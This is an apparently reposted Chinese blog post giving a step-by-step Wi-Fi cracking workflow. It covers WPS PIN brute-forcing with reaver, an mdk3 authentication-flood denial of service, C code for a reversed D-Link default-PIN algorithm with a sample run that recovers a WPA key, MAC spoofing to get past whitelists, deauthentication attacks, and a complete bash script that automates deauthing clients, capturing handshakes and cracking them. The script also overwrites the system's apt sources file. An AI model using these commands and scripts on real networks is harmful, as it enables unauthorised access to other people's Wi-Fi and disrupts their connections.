为了方便自己今后看 ,就拉过来了
0x00 流程图
0x01 获取bssid和essid
reference:
https://www.aircrack-ng.org/documentation.html
0x02 探测是否开启wps(Wi-Fi protected setup)
command:airodump-ng MB,wash -i mon0 -C
54e.:默认开启wps,54e:默认不开启
当我们为wifi设置了一个复杂的密码时,每次接入一个新的设备都要重复输入这个密码,过程略微繁琐,wps的出现就是为了解决这个问题.
它提供了一个8位纯数字的秘钥,认证成功即可连接wifi.
但是这8位数是分开认证的,先验证前4位,再验证5-7位,所以最多只需要爆破11000-1次即可成功.
少数路由器wps开启与否是由按钮控制,在能物理接触路由器的情况下,可以手动开启.
reference:
http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/
0x03 探测pin
command:reaver -i mon0 -b ap_bssid -vv
一:ap denial service
当路由器不再响应的时候,可以用DoS攻击让ap拒绝服务,受害者重启路由.
常用的就是authentication flood attack,攻击者可以伪造源MAC地址(基于802.11的报文发送机制)发送authenticate到目标AP,重复发送这种请求,最终会耗尽AP内存导致拒绝服务.
command:mdk3 a mon0 -a bssid -c
reference:
https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108
http://tools.kali.org/wireless-attacks/mdk3
http://xiao106347.blog.163.com/blog/static/215992078201425920197
二:get password
reference:
http://tools.kali.org/wireless-attacks/reaver
http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/
https://www.pwnieexpress.com/blog/wps-cracking-with-reaver
http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver
0x04 利用算法漏洞直接获取pin
devttys0站长通过逆向D-link、belkin固件的wps pin生成算法,直接得到默认pin码.
以d-link为例,获取ap bssid,拆分后进行异或、与、移位等操作生成pin,伪c代码如下:
unsigned int generate_default_pin(char *buf)
{
char *mac;
char mac_address[32] = { 0 };
unsigned int oui, nic, pin;
/* Get a pointer to the WAN MAC address */
mac = lockAndGetInfo_log()->wan_mac_address;
/*
* Create a local, NULL-terminated copy of the WAN MAC (simplified from
* the original code's sprintf/memmove loop).
*/
sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5],
mac[6],
mac[7],
mac[8],
mac[9],
mac[10],
mac[11]);
/*
* Convert the OUI and NIC portions of the MAC address to integer values.
* OUI is unused, just need the NIC.
*/
sscanf(mac_address, "%06X%06X", &oui, &nic);
/* Do some XOR munging of the NIC. */
pin = (nic ^ 0x55AA55);
pin = pin ^ (((pin & 0x0F) << 4) +
((pin & 0x0F) << 8) +
((pin & 0x0F) << 12) +
((pin & 0x0F) << 16) +
((pin & 0x0F) << 20));
/*
* The largest possible remainder for any value divided by 10,000,000
* is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
*/
pin = pin % 10000000;
/* The pin needs to be at least 7 digits long */
if(pin < 1000000)
{
/*
* The largest possible remainder for any value divided by 9 is
* 8; hence this adds at most 9,000,000 to the pin value, and at
* least 1,000,000. This guarantees that the pin will be 7 digits
* long, and also means that it won't start with a 0.
*/
pin += ((pin % 9) * 1000000) + 1000000;
}
/*
* The final 8 digit pin is the 7 digit value just computed, plus a
* checksum digit. Note that in the disassembly, the wps_pin_checksum
* function is inlined (it's just the standard WPS checksum implementation).
*/
pin = ((pin * 10) + wps_pin_checksum(pin));
sprintf(buf, "%08d", pin);
return pin;
}$ sudo airodump-ng mon0 -c 4
CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6
$ ./pingen C0:A0:BB:EF:B3:D7 # <--- WAN MAC is BSSID+1
Default Pin: 99767389
$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'reference:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
http://www.devttys0.com/2015/04/reversing-belkins-wps-pin-algorithm/
0x05 密码相关app被共享
zke1ev3n大牛逆向了万能钥匙APP,发现发送的AP相关的信息经过了AES加密,私钥和IV都硬编码在程序中.设备指纹放在sign字段,经过md5(设备指纹信息+salt)加密,salt也硬编码在程序中,这部分信息当做签名来验证请求是否合法.
返回信息同样经过AES加密,用的相同的key和IV.
http://www.wifi4.cn实现了这个加密流程.
reference:
http://zke1ev3n.me/2016/04/06/WiFi%E4%B8%87%E8%83%BD%E9%92%A5%E5%8C%99%E6%8E%A5%E5%8F%A3%E5%8D%8F%E8%AE%AE%E7%A0%B4%E8%A7%A3/
https://github.com/Zke1ev3n/WiFiMaster/blob/master/WiFiMaster.py
0x06 mac白名单限制
mac address被烧录在网卡的EEPROM中,每次网卡初始化时会从EEPROM中读取mac地址并将其写入到一个缓冲区(win下是写到注册表)
发送报文时,相关api读取mac地址是从缓冲区中读取,而不是去EEPROM中.
command:
1.airodump-ng mon0 (获得已连接到AP的client bssid)
2.ifconfig wlan0 hw ether 00:01:02:03:04:05. reference:
https://en.wikipedia.org/wiki/MAC_spoofing
https://collegetimes.co/change-mac-address/
http://xiao106347.blog.163.com/blog/static/21599207820131014101844104/
0x07 抓取握手包
1.airodump-ng -w /tmp/test.cap-c channelNum --bssid apmac mon0
2.deauth client
Wi-Fi deauthentication attack
IEEE 802.11协议中包含了deauthentication frame,用来中断server和client的认证.
攻击者只需知道client bssid,基于报文发送机制,伪造mac,可以在任何时间向AP发送deauthentication请求.
如果这个攻击是持续的,目标client会无法连接AP. 其实这个时候可以结合pineapple伪造AP准备嗅探了.
command: aireplay-ng-0 攻击次数 -a apmac -c clientmac -x 发包速率 mon1
reference:
https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108
3.get handshake
0x08 autoGetHandshakePackage Script
#!/bin/bash
# this script use auto get wifi handshake package
# os : debian
# date: 2016/11/08 14:05:05 CST
function onExit(){
$(kill $$)
ps xua | grep airodump-ng | awk '{print $2}' | xargs kill -9
echo "[*] you hit ctrl+c or kill $$. now exiting...;"
}
function helpDoc(){
echo "#-------------------------------------------------------"
echo "[+] usage: ./autoGetHandshake.sh <interface> <ap_name>"
echo "[-] example: ./autoGetHandshake.sh wlan0 tp_link1422"
echo "[-] ./autoGetHandshake.sh moresec tp_link1422"
echo "[-] interface default choice first network card. set interface=\"moresec\""
echo "#-------------------------------------------------------"
exit 0
}
function setAirPath(){
airmonPath=$(which airmon-ng)
airodumpPath=$(which airodump-ng)
aireplayPath=$(which aireplay-ng)
aircrackPath=$(which aircrack-ng)
}
function deauthAttackAndGetHandshake(){
(
${airodumpPath} wlan0mon --bssid $1 -c $2 -w pr0mise --output-format cap
) &
sleep 30
for ((i=0;i<3;i++))
do
${aireplayPath} -0 5 -a $1 wlan0mon
sleep 3
done
currentBssid=$1
#return
}
#-----------------------------------------------------------
trap onExit SIGQUIT INT
verifySourcePackgeExist="wireless"
airmonPath=""
aireplayPath=""
airodumpPath=""
aircrackPath=""
case $1 in
""|h*|-h*|--help )
helpDoc;;
#break;;
esac
if [ -z $2 ]; then helpDoc ; fi
if [ ! -e $(which aircrack-ng) ]
then
echo "[+] file not exist"
verifySourcePackgeExist=$(apt-cache search aircrack-ng | head -n 1 | grep $verifySourcePackgeExist)
echo "[-] "$verifySourcePackgeExist
if [ -z "$verifySourcePackgeExist" ]
then
echo "deb http://mirrors.aliyun.com/kali sana main non-free contrib" | tee /etc/apt/sources.list
echo "deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free" | tee /etc/apt/sources.list
echo "deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free" | tee /etc/apt/sources.list
echo "[-] aliyun mirror into /etc/apt/sources."
apt-get update
fi
apt-get install -y aircrack-ng
updatedb
else
echo "[+] aircrack-ng already exist"
fi
setAirPath
#-----------------------------------------------------------
if [[ -z $(ifconfig|grep wlan0mon) ]]
then
#default choice first net card
if [[ "$1" = "moresec" ]]
then
interfaceName=$(cat /proc/net/wireless | awk 'NR==3 {if(/:/)gsub(/:/,""); print $1}')
if [ -z $interfaceName ]
then
echo "[+] wireless not found. please try exec (/etc/init.d/networking restart && /etc/init.d/network-manager restart)"
echo "[+] if the solution is not beautiful...maybe... reboot?"
exit 0
fi
else
interfaceName=$1
fi
echo "[*] interface name is $interfaceName"
${airmonPath} check kill
echo "[*] exec(airmon check kill)"
${airmonPath} start $interfaceName
echo "[+] wireless net card ($interfaceName) state is LISTENING"
else
echo "[+] wlan0mon already EASTABLISHED"
fi
#-----------------------------------------------------------
apName=$2
(
(
${airodumpPath} wlan0mon -w temp --output-format csv
) &
sleep 10
ps xua | grep airodump-ng | awk '{print $2}' | xargs kill
)
echo "[+] kill airodump-ng process successful"
#-----------------------------------------------------------
# get bssid and channel
# gsub/grep/sub etc.
# test=" moresec"
# gsub(/\s/,"",$test) => "moreec"
# eliminate 's' and ' ' character. yikesaiting
# multiple escape.
# so . correct : gsub(/\\s/,"",$test) => "moresec"
bssid=""
channel=0
verifyCsvExistApName=$(awk -F ',' '{print $14}' temp*.csv |awk '{gsub(/\\s/,"");print $1}' | grep ${apName}|wc -l)
echo $verifyCsvExistApName
if [[ verifyCsvExistApName -ge 1 ]]
then
echo "[+] get bssid,channel"
deauthAttackAndGetHandshake $(awk -F ',' '{sub(/^ /,"",$14);if($14=="'${apName}'") print $1,$4}' temp*.csv)
#if($14=="${apName}") -> awk parse -> if($14=="")
ps xua | grep airodump-ng | awk '{print $2}' | xargs kill -9
else
echo "[+] ap_name not found. please recapture handshake package"
exit 0
fi
#-----------------------------------------------------------
rm temp*.csv
mv pr0mise*.cap ${apName}_${currentBssid}.cap
${aircrackPath} ${apName}_${currentBssid}.cap -J ${apName}_${currentBssid}
clear
echo "[+] over. good luck."
exit 0Related
- 缓冲区溢出保护及绕过等等
- CVE-2013-3934 Wps栈溢出分析
- 对Etag追踪的胡思乱想
- 从栈溢出到简单的shellcode开发
- 关于被动式扫描的一点碎碎念[sqlmapapi]
- CVE-2016-5734分析-phpmyadmin authorized rce
- 关于数据类型安全
- 某游戏活动漏洞
- netshell loadlibrary evil dll-privilege escalation(from Admin to SYSTEM)2333
- 小学生译文-JetBrains远程命令执行and信息泄露-一个POST请求沦陷开发人员机器
- 某ctf的几道题
- heap overflow
- 种子清洗
- 如何找到人群中的美女
- d提起模糊测试时我们在说什么
- 从一次失败的xss挖掘引发的猜想
- 某vpn的破解笔记
3784
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
